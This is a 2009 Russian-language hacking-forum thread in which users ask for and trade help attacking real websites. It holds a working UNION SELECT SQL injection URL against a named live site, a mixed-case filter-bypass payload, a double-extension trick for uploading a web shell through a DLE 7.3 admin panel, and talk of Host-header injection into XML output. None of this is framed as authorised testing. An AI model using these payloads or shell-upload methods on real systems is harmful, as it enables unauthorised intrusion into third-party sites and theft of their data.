HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.08.2009, 15:55
u36a
Познающий
Регистрация: 18.11.2008
Сообщений: 53
Провел на форуме:
170968

Репутация: 10
По умолчанию

Цитата:
Есть доступ к dle админке, версия 7.3.

Включил возможность добавлять файлы, но к новости так прикрепить и не смог.

Да и если бы получилось, то насколько я понимаю и проверил, папка /uploads/files/ защищена .htaccess:

PHP код:
<FilesMatch ".*">
   
Order allow,deny
   Deny from all
</FilesMatch>

<
FilesMatch "\.(avi|mp3|mp4|flv|swf|wmv)$|^$">
   
Order deny,allow
   Allow from all
</FilesMatch
Какие есть способы залить шел?
Есть доступ к бд, где таблицы dle (просмотр\запись, не root@mysql). Может можно там поменять пути на файлы?

Странно, но не могу найти, где добавлять файлы к новостям, в настройках разрешил добавлять файлы, указал расширения нужные, размер и т.п. А там где добавление новостей или их редактирование не могу найти, как всунуть атач.
 
Ответить с цитированием

  #2  
Старый 16.08.2009, 03:55
u36a
Познающий
Регистрация: 18.11.2008
Сообщений: 53
Провел на форуме:
170968

Репутация: 10
Question

Цитата:
Сообщение от u36a  
Есть доступ к бд, где таблицы dle (просмотр\запись, не root@mysql). Может можно там поменять пути на файлы?

Странно, но не могу найти, где добавлять файлы к новостям, в настройках разрешил добавлять файлы, указал расширения нужные, размер и т.п. А там где добавление новостей или их редактирование не могу найти, как всунуть атач.
.php перед flv убирается движком..

Удалось залить файл ......../uploads/files/1250379992_functions.phtml.flv

но он не интрепретируется, а скачивается...

Какие ещё есть варианты залить шел через движок дле 7.3 версии?
 
Ответить с цитированием

  #3  
Старый 14.08.2009, 15:57
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

http://www.broowaha.com/profile.php?id=-2434+union+select+1,2,3,4,5,concat_ws(0x3a,version (),database(),user()),7,8,9,0,11,12,13,14,15,16,17/*
 
Ответить с цитированием

  #4  
Старый 15.08.2009, 02:04
pento
Участник форума
Регистрация: 03.07.2006
Сообщений: 147
Провел на форуме:
438137

Репутация: 66
По умолчанию

Вопрос: есть бажный PHP-скрипт, который использует значение переменной HTTP_HOST при генерации XML (то есть в самом XML это значение используется без какого-либо экранирования спец. символов) и потом его отдаёт на скачивание. Что можно провернуть в данном случае? Да, мы можем варьировать HTTP Host заголовком..но что это нам даёт?
 
Ответить с цитированием

  #5  
Старый 15.08.2009, 02:44
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055

Репутация: 347
По умолчанию

если изменить поле Host в запросе то веб-сервер просто не узнает какому из виртуальных хостов пришел запрос. То есть до скрипта он уже вряд ли дойдет
 
Ответить с цитированием

  #6  
Старый 15.08.2009, 19:18
pento
Участник форума
Регистрация: 03.07.2006
Сообщений: 147
Провел на форуме:
438137

Репутация: 66
По умолчанию

Цитата:
Сообщение от bons  
если изменить поле Host в запросе то веб-сервер просто не узнает какому из виртуальных хостов пришел запрос. То есть до скрипта он уже вряд ли дойдет
Только в случае, если виртуальные хосты host-based.
Уязвимость имеет место, то есть скрипт исполняется и в теле XML фигурирует значение Host-заголовка.
 
Ответить с цитированием

  #7  
Старый 15.08.2009, 21:26
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637

Репутация: 27
По умолчанию

нашел скулю но там какая-та фильтрация
смотрим

видим 1 юзера
http://playthegame.od.ua/index.php?action=9&showuser=3058

видем юзера под ид 3057
http://playthegame.od.ua/index.php?action=9&showuser=3058-1

если делаем так то видим ошибку
http://extremission.com.ua/index.php?action=8

но при попытки
http://playthegame.od.ua/index.php?action=9&showuser=3058
дописать что-то типо union select и т.п. ничего не получаеться....
есть идеи*?
 
Ответить с цитированием

  #8  
Старый 16.08.2009, 00:28
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


По умолчанию

Цитата:
Сообщение от Grema  
нашел скулю но там какая-та фильтрация
смотрим

видим 1 юзера
http://playthegame.od.ua/index.php?action=9&showuser=3058

видем юзера под ид 3057
http://playthegame.od.ua/index.php?action=9&showuser=3058-1

если делаем так то видим ошибку
http://extremission.com.ua/index.php?action=8

но при попытки
http://playthegame.od.ua/index.php?action=9&showuser=3058
дописать что-то типо union select и т.п. ничего не получаеться....
есть идеи*?
ne nadoelo? Nu prob'esh ty golovoy stenku. chto ty budesh delat' v sosednej kamere?
 
Ответить с цитированием

  #9  
Старый 16.08.2009, 05:44
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Grema  
нашел скулю но там какая-та фильтрация
смотрим

видим 1 юзера
http://playthegame.od.ua/index.php?action=9&showuser=3058

видем юзера под ид 3057
http://playthegame.od.ua/index.php?action=9&showuser=3058-1

если делаем так то видим ошибку
http://extremission.com.ua/index.php?action=8

но при попытки
http://playthegame.od.ua/index.php?action=9&showuser=3058
дописать что-то типо union select и т.п. ничего не получаеться....
есть идеи*?
Может быть intval();
Хотя &showuser=3058-1 работает.
пробуй
unIoN+SeLecT
Может быть просто фильтр.
 
Ответить с цитированием

  #10  
Старый 15.08.2009, 18:54
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Если вам надо версию то )
&chapNum=-1+union+select+version()
И таким макаром
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.